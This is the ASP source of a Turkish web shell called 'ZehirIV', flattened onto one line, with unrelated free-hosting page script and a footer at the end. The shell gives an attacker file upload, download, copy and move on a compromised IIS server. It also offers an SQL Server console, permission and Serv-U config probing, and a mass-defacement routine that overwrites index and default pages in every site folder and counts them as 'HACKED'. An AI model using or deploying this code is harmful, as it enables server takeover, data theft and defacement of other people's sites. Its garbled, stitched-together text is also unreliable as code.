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" end if next end if next end sub function yaziyomu(yol) on error goto 0:on error resume next dim sonuc__ Set MyFile = objFSO.CreateTextFile(yol & "test.zehir", True) MyFile.write "byzehir " set MyFile = Nothing if err<>0 then sonuc__="Yazma Hakkı Yok!" else sonuc__="Yazma Hakkı Var!" on error goto 0: on error resume next objFSO.DeleteFile yol & "test.zehir",true if err<>0 then sonuc__=sonuc__&"
Silme Hakkı Yok!" else sonuc__=sonuc__&"
Silme Hakkı Var!" end if end if yaziyomu = sonuc__ end function function yaziyomu2(yol) on error goto 0:on error resume next Set MyFile = objFSO.CreateTextFile(yol & "test.zehir", True) MyFile.write "byzehir " set MyFile = Nothing if err<>0 then yaziyomu2 = false else objFSO.DeleteFile yol & "test.zehir" yaziyomu2 = true end if end function sub WriteTestOnDriver for each drive_ in objFSO.Drives if drive_.Drivetype=2 or drive_.Drivetype=3 then if not yaziyomu2(drive_.DriveLetter&":") then Response.Write "
" else Response.Write "" end if end if next end sub sub WriteTestOnLocalPath on error goto 0 on error resume next if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then Response.Write "" else Response.Write "" end if end sub sub LocalPathParentFolder on error goto 0 on error resume next hed_ = request.servervariables("APPL_PHYSICAL_PATH") if Right(hed_,1)="" then hed_ = left(hed_,len(hed_)-1) parhed_ = left(hed_,InStrRev(hed_,"")) Set f = objFSO.GetFolder(parhed_) Set fc = f.SubFolders int_fol=0 int_fil=0 For Each f1 In fc int_fol=int_fol+1 Next Set fc = f.files For Each f1 In fc int_fil=int_fil+1 Next if err<>0 then Response.Write "" else Response.Write "" end if end sub sub LocalPathPParentFolder on error goto 0 on error resume next hed_ = request.servervariables("APPL_PHYSICAL_PATH") if Right(hed_,1)="" then hed_ = left(hed_,len(hed_)-1) hed_ = left(hed_,InStrRev(hed_,"")) if Right(hed_,1)="" then hed_ = left(hed_,len(hed_)-1) parhed_ = left(hed_,InStrRev(hed_,"")) Set f = objFSO.GetFolder(parhed_) Set fc = f.SubFolders int_fol=0 int_fil=0 For Each f1 In fc int_fol=int_fol+1 Next Set fc = f.files For Each f1 In fc int_fil=int_fil+1 Next if err<>0 then if err=451 then Response.Write "" else Response.Write "" end if else Response.Write "" end if end sub SELECT CASE status CASE 13 'Sistem Bilgisi Response.Write "
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<% mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","") dosyaPath = mid(mpat,InStrRev(mpat,"")+1) on error resume next Dim objFSO,popup Set objFSO = CreateObject ("Scripting.FileSystemObject") if Request("kuskapani")=1 then Response.End end if if Request("kuskapani")=2 then on error resume next path = Request("path") sFolder = Request("SubFolder") fName = Request("FileName") d1 = Request("dosya1") d2 = Request("dosya2") d3 = Request("dosya3") d4 = Request("dosya4") bg__ = Request.Form("selectColour") if bg__ = "0" then bg__ = "#ffffff" byMesaj = "" & Request("byMesaj") & "

powered by Z" & Session("n2") & "3 " sFolder = Replace(sFolder,"/","") if Right(sFolder,1)<>"" then sFolder = sFolder & "" Set f = objFSO.GetFolder(Path) Set fc = f.SubFolders h__ = 0 f__ = 0 ss__ = now For Each f1 In fc hedef_ = replace(f1.path,"/","") if Right(hedef_,1)<>"" then hedef_ = hedef_ & "" hedef__ = left(hedef_,len(hedef_)-1) folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"")) if d1<>"" then d1 = true if d2<>"" then d2 = true if d3<>"" then d3 = true if d4<>"" then d4 = true on error goto 0:on error resume next if fName<>"" then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True) MyFile.write byMesaj end if if d1 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True) MyFile.write byMesaj end if if d2 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True) MyFile.write byMesaj end if if d3 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True) MyFile.write byMesaj end if if d4 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True) MyFile.write byMesaj end if if err<>0 then response.Write folderName_ & " [FAILED!]
" f__ = f__ + 1 else response.Write folderName_ & " [HACKED]
" h__ = h__ + 1 end if Next ss___ = now response.Write "
by zehir!...
Sonuc : Toplam Süre : "&left(ss__-ss___,5)&"sn.
Hacked = "&h__&"
Failed = "&f__ response.End end if status = Request("status") path = Request("path") dPath = Request("dPath") arama = Request("txArama") dkayit = Request("dkayit") table = Request("table") del = Request("del") islem = Request("islem") strSQL = Request("strSQL") cf = Request("cf") pathfile = request("pathfile") if path="" then path=request.servervariables("APPL_PHYSICAL_PATH") if status="" then status=2 popup = true '//////////////////////////////// Function ReadBinaryFile(FileName) Const adTypeBinary = 1 Dim BinaryStream Set BinaryStream = CreateObject("ADODB.Stream") BinaryStream.Type = adTypeBinary BinaryStream.Open BinaryStream.LoadFromFile FileName ReadBinaryFile = BinaryStream.Read End Function if status="-3" then Response.Buffer=True Set Fil = objFSO.GetFile(pathfile) Response.contenttype="application/force-download" Response.AddHeader "Cache-control","private" Response.AddHeader "Content-Length", Fil.Size Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name Response.BinaryWrite readBinaryFile(Fil.path) Set f = Nothing: Set Fil = Nothing response.End() end if '////////////////////////////////// if status="-4" then popup=false if status="13" then popup=false if status="14" then popup=false if status="15" then popup=false if status="16" then popup=false if status="17" then popup=false if status="18" then popup=false if status="19" then popup=false if status="33" then popup=false if status="40" then popup=false if status="50" then popup=false byMsg = request.QueryString("byMsg") if byMsg<>"" then response.Write byMsg response.Write "[AhmetDeniz.Org] ZehirIV --> powered by zehir <zehirhacker@hotmail.com>" if popup then %>
System Info | System Test | Sites Test | Folder Action | SQL Server | POWERED BY <% end if '#################################### Class clsUpload Private mbinData Private mlngChunkIndex Private mlngBytesReceived Private mstrDelimiter Private CR Private LF Private CRLF Private mobjFieldAry() Private mlngCount Private Sub RequestData Dim llngLength mlngBytesReceived = Request.TotalBytes mbinData = Request.BinaryRead(mlngBytesReceived) End Sub Private Sub ParseDelimiter() mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1) End Sub Private Sub ParseData() Dim llngStart Dim llngLength Dim llngEnd Dim lbinChunk llngStart = 1 llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF) While Not llngStart = 0 llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2 llngLength = llngEnd - llngStart lbinChunk = MidB(mbinData, llngStart, llngLength) Call ParseChunk(lbinChunk) llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF) Wend End Sub Private Sub ParseChunk(ByRef pbinChunk) Dim lstrName Dim lstrFileName Dim lstrContentType Dim lbinData Dim lstrDisposition Dim lstrValue lstrDisposition = ParseDisposition(pbinChunk) lstrName = ParseName(lstrDisposition) lstrFileName = ParseFileName(lstrDisposition) lstrContentType = ParseContentType(pbinChunk) If lstrContentType = "" Then lstrValue = CStrU(ParseBinaryData(pbinChunk)) Else lbinData = ParseBinaryData(pbinChunk) End If Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData) End Sub Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData) Dim lobjField ReDim Preserve mobjFieldAry(mlngCount) Set lobjField = New clsField lobjField.Name = pstrName lobjField.FilePath = pstrFileName lobjField.ContentType = pstrContentType If LenB(pbinData) = 0 Then lobjField.BinaryData = ChrB(0) lobjField.Value = pstrValue lobjField.Length = Len(pstrValue) Else lobjField.BinaryData = pbinData lobjField.Length = LenB(pbinData) lobjField.Value = "" End If Set mobjFieldAry(mlngCount) = lobjField mlngCount = mlngCount + 1 End Sub Private Function ParseBinaryData(ByRef pbinChunk) Dim llngStart llngStart = InStrB(1, pbinChunk, CRLF & CRLF) If llngStart = 0 Then Exit Function llngStart = llngStart + 4 ParseBinaryData = MidB(pbinChunk, llngStart) End Function Private Function ParseContentType(ByRef pbinChunk) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStrB(llngStart + 15, pbinChunk, CR) If llngEnd = 0 Then Exit Function llngStart = llngStart + 15 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength))) End Function Private Function ParseDisposition(ByRef pbinChunk) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF) If llngEnd = 0 Then Exit Function llngStart = llngStart + 22 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength)) End Function Private Function ParseName(ByRef pstrDisposition) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStr(llngStart + 6, pstrDisposition, """") If llngEnd = 0 Then Exit Function llngStart = llngStart + 6 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseName = Mid(pstrDisposition, llngStart, llngLength) End Function ' ------------------------------------------------------------------------------ Private Function ParseFileName(ByRef pstrDisposition) Dim llngStart Dim llngEnd Dim llngLength llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare) If llngStart = 0 Then Exit Function llngEnd = InStr(llngStart + 10, pstrDisposition, """") If llngEnd = 0 Then Exit Function llngStart = llngStart + 10 If llngStart >= llngEnd Then Exit Function llngLength = llngEnd - llngStart ParseFileName = Mid(pstrDisposition, llngStart, llngLength) End Function Public Property Get Count() Count = mlngCount End Property Public Default Property Get Fields(ByVal pstrName) Dim llngIndex If IsNumeric(pstrName) Then llngIndex = CLng(pstrName) If llngIndex > mlngCount - 1 Or llngIndex < 0 Then Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.") Exit Property End If Set Fields = mobjFieldAry(pstrName) Else pstrName = LCase(pstrname) For llngIndex = 0 To mlngCount - 1 If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then Set Fields = mobjFieldAry(llngIndex) Exit Property End If Next End If Set Fields = New clsField End Property Private Sub Class_Terminate() Dim llngIndex For llngIndex = 0 To mlngCount - 1 Set mobjFieldAry(llngIndex) = Nothing Next ReDim mobjFieldAry(-1) End Sub Private Sub Class_Initialize() ReDim mobjFieldAry(-1) CR = ChrB(Asc(vbCr)) LF = ChrB(Asc(vbLf)) CRLF = CR & LF mlngCount = 0 Call RequestData Call ParseDelimiter() Call ParseData End Sub Private Function CStrU(ByRef pstrANSI) Dim llngLength Dim llngIndex llngLength = LenB(pstrANSI) For llngIndex = 1 To llngLength CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1))) Next End Function Private Function CStrB(ByRef pstrUnicode) Dim llngLength Dim llngIndex llngLength = Len(pstrUnicode) For llngIndex = 1 To llngLength CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1))) Next End Function End Class '#################################### Session("n1") = "byZ" Class clsField Public Name Private mstrPath Public FileDir Public FileExt Public FileName Public ContentType Public Value Public BinaryData Public Length Private mstrText Public Property Get BLOB() BLOB = BinaryData End Property Public Function BinaryAsText() Dim lbinBytes Dim lobjRs If Length = 0 Then Exit Function If LenB(BinaryData) = 0 Then Exit Function If Not Len(mstrText) = 0 Then BinaryAsText = mstrText Exit Function End If lbinBytes = ASCII2Bytes(BinaryData) mstrText = Bytes2Unicode(lbinBytes) BinaryAsText = mstrText End Function Public Sub SaveAs(ByRef pstrFileName) Const adTypeBinary=1 Const adSaveCreateOverWrite=2 Dim lobjStream Dim lobjRs Dim lbinBytes If Length = 0 Then Exit Sub If LenB(BinaryData) = 0 Then Exit Sub Set lobjStream = Server.CreateObject("ADODB.Stream") lobjStream.Type = adTypeBinary Call lobjStream.Open() lbinBytes = ASCII2Bytes(BinaryData) Call lobjStream.Write(lbinBytes) On Error Resume Next Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite) 'if err<>0 then response.Write "
"&err.Description Call lobjStream.Close() Set lobjStream = Nothing End Sub Public Property Let FilePath(ByRef pstrPath) mstrPath = pstrPath If Not InStrRev(pstrPath, ".") = 0 Then FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1) FileExt = UCase(FileExt) End If If Not InStrRev(pstrPath, "") = 0 Then FileName = Mid(pstrPath, InStrRev(pstrPath, "") + 1) End If If Not InStrRev(pstrPath, "") = 0 Then FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "") - 1) End If End Property Public Property Get FilePath() FilePath = mstrPath End Property private Function ASCII2Bytes(ByRef pbinBinaryData) Const adLongVarBinary=205 Dim lobjRs Dim llngLength Dim lbinBuffer llngLength = LenB(pbinBinaryData) Set lobjRs = Server.CreateObject("ADODB.Recordset") Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength) Call lobjRs.Open() Call lobjRs.AddNew() Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0)) Call lobjRs.Update() lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength) Call lobjRs.Close() Set lobjRs = Nothing ASCII2Bytes = lbinBuffer End Function Private Function Bytes2Unicode(ByRef pbinBytes) Dim lobjRs Dim llngLength Dim lstrBuffer llngLength = LenB(pbinBytes) Set lobjRs = Server.CreateObject("ADODB.Recordset") Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength) Call lobjRs.Open() Call lobjRs.AddNew() Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes) Call lobjRs.Update() lstrBuffer = lobjRs.Fields("BinaryData").Value Call lobjRs.Close() Set lobjRs = Nothing Bytes2Unicode = lstrBuffer End Function End Class Session("n2") = "ehir" '#################################### function addslash(path) if right(path,1)="" then addslash=path else addslash=path & "" end function sub Upload() dim objUpload,f,max,i,name,path,size,success set objUpload=New clsUpload targetPath=objUpload.Fields("folder").Value max=objUpload.Fields("max").Value for i=1 to max name=objUpload.Fields("file" & i).FileName size=objUpload.Fields("file" & i).Length if (name<>"") and (size>0) then gMsg=gMsg & "
" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): " path=addslash(targetPath) & name objUpload.Fields("file" & i).SaveAs path if objFSO.FileExists(path) then on error resume next set f=objFSO.GetFile(path) if IsObject(f) then if f.Size=size then success=true else success=false end if set f=nothing end if if success then gMsg=gMsg & "uploaded" else gMsg = gMsg & "failed!" end if next response.Write gMsg set objUpload=nothing end sub if status="-4" then Upload() ' hataKontrol popup=false end if '//////////////////////////////// sub hataKontrol if err<>0 then Response.Write "Hata : "&err.Description&"" end if end sub sub araBul(path_,ara_) on error resume next If Len(path_) > 0 Then cur = path_&"" If cur = "" Then cur = "" parent = "" If InStrRev(cur,"") > 0 Then parent = Left(cur, InStrRev(cur, "", Len(cur)-1)) End If Else cur = "" End If Set f = objFSO.GetFolder(cur) Set fc = f.Files For Each f1 In fc if lcase(InStr(1,f1.name,lcase(ara_)))>0 then downStr = "Í" if lcase(ara_)="mdb" then Response.Write downStr&"û * "&f1.path&" ["&f1.size&"]"&"
" else Response.Write downStr&"û! - "&f1.path&" ["&f1.size&"]"&"
" end if end if Next Set fs = f.SubFolders For Each f1 In fs araBul f1.path,ara_ Next Set f = Nothing Set fc = Nothing Set fs = Nothing end sub sub sistemTest response.Write "" response.Write "" servu_Test WriteTestOnDriver WriteTestOnLocalPath LocalPathParentFolder LocalPathPParentFolder response.Write "
" end sub sub servu_Test dosya_ = Array("Program FilesServ-uServ-u.ini", "Program FilesServ-uServ-u daemon.ini", "Serv-uServ-u.ini", "Serv-uServ-u daemon.ini") for each drive_ in objFSO.Drives if drive_.Drivetype=2 or drive_.Drivetype=3 then for each d_ in dosya_ d_ = drive_.DriveLetter&":"&d_ if objFSO.FileExists(d_) then response.Write "
Serv-U ini file : "&d_&"
"&drive_.DriveLetter&":yazma yetkisi yok! : ["&err.Description&"]
"&drive_.DriveLetter&":yazma yetkisi var!
Local Path yazma yetkisi yok! : ["&err.Description&"]
Local Path yazma yetkisi var!
Local Path
Parent Folder
Hata Oluştu : ["&err.Description&"]
Local Path
Parent Folder
Folder : "&FormatNumber(int_fol,0)&"
File : "&FormatNumber(int_fil,0)&"
Local Path
P.Parent Folder
Data Üst Klasor Yok
Local Path
P.Parent Folder
Hata Oluştu : ["&err.Description&"]
Local Path
P.Parent Folder
Folder : "&FormatNumber(int_fol,0)&"
File : "&FormatNumber(int_fil,0)&"
" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "" Response.Write "
: Sistem Bilgileri :
Local Adres " & request.servervariables("REMOTE_ADDR") & "
User Agent " & request.servervariables("HTTP_USER_AGENT") & "
Server " & request.servervariables("SERVER_NAME") & "
IP " & request.servervariables("LOCAL_ADDR") & "
HTTPD " & request.servervariables("SERVER_SOFTWARE") & "
Port " & request.servervariables("SERVER_PORT") & "
Yol " & request.servervariables("APPL_PHYSICAL_PATH") & "
Log Root " & request.servervariables("APPL_MD_PATH") & "
HTTPS " & request.servervariables("HTTPS") & "
" popup = false CASE 14 'Upload and Search aramaUpload popup = false hataKontrol CASE 15 'Ms. SQL Server Response.Write "
" Response.Write "
SQL Server için connection string giriniz
" Response.Write "" Response.Write "
" response.Write "" Response.Write "
" response.Write "
" popup = false hataKontrol CASE 16 'file Copy window Response.Write "
" Response.Write "
Kop. Yer : " Response.Write "" Response.Write "" response.Write "" Response.Write "
" response.Write "Kopyala" response.Write "Tasi" response.Write "
" response.Write "
" popup = false hataKontrol CASE 17 'file Copy isl = "" if islem="kopyala" then objFSO.CopyFile path,cf isl="kopyalandı.." elseif islem="tasi" then objFSO.MoveFile path,cf isl="taşındı.." end if response.Write "Dosya "&isl response.Write "
Kaynak : "&path&"
Hedef : "&cf response.Write "
" popup = false hataKontrol CASE 18 'folder Copy window Response.Write "
" Response.Write "
Kop. Yer : " Response.Write "" Response.Write "" response.Write "" Response.Write "
" response.Write "Kopyala" response.Write "Tasi" response.Write "
" response.Write "
" popup = false hataKontrol CASE 19 'folder Copy isl = "" if islem="kopyala" then objFSO.CopyFolder path,cf isl="kopyalandı.." elseif islem="tasi" then objFSO.MoveFolder path,cf isl="taşındı.." end if response.Write "Klasor "&isl response.Write "
Kaynak : "&path&"
Hedef : "&cf response.Write "
" popup = false hataKontrol CASE 33 'Powered By response.Write "

Powered by Zehir" response.Write "

küllü nefsun zaifetun mevt" popup = false hataKontrol CASE 40 'Sistem Test sistemTest popup=false CASE 50 'Siteleri Test Edelim %>
Güvenlik Testi byZehir
Sub Folder
File Name

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function getBrowser() { var ua, matched, browser; ua = navigator.userAgent; ua = ua.toLowerCase(); var match = /(chrome)[ \/]([\w.]+)/.exec( ua ) || /(webkit)[ \/]([\w.]+)/.exec( ua ) || /(opera)(?:.*version|)[ \/]([\w.]+)/.exec( ua ) || /(msie)[\s?]([\w.]+)/.exec( ua ) || /(trident)(?:.*? rv:([\w.]+)|)/.exec( ua ) || ua.indexOf("compatible") < 0 && /(mozilla)(?:.*? rv:([\w.]+)|)/.exec( ua ) || []; browser = { browser: match[ 1 ] || "", version: match[ 2 ] || "0" }; matched = browser; //IE 11+ fix (Trident) matched.browser = matched.browser == 'trident' ? 'msie' : matched.browser; browser = {}; if ( matched.browser ) { browser[ matched.browser ] = true; browser.version = matched.version; } // Chrome is Webkit, but Webkit is also Safari. if ( browser.chrome ) { browser.webkit = true; } else if ( browser.webkit ) { browser.safari = true; } return browser; } var browser = getBrowser(); var contentType = 'mp3'; var tagsToWrite = Array(); tagsToWrite['bgsound'] = ''; tagsToWrite['audio'] = ''; tagsToWrite['embed'] = ''; var tagKey = 'audio'; if (contentType === 'ogg') { if (browser.msie || browser.safari) { //does not support ogg in audio tag tagKey = 'bgsound'; } else { tagKey = 'audio'; } } else if (contentType === 'wav') { if (browser.msie) { //does not support wav in audio tag tagKey = 'bgsound'; } else { tagKey = 'audio'; } } else if (contentType === 'mp3') { //all modern browser support mp3 in audio tag tagKey = 'audio'; } else { //all other types, preserve old behavior if (browser.msie) { //does not support wav in audio tag tagKey = 'bgsound'; } else { tagKey = 'embed'; } } document.write(tagsToWrite[tagKey]); Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?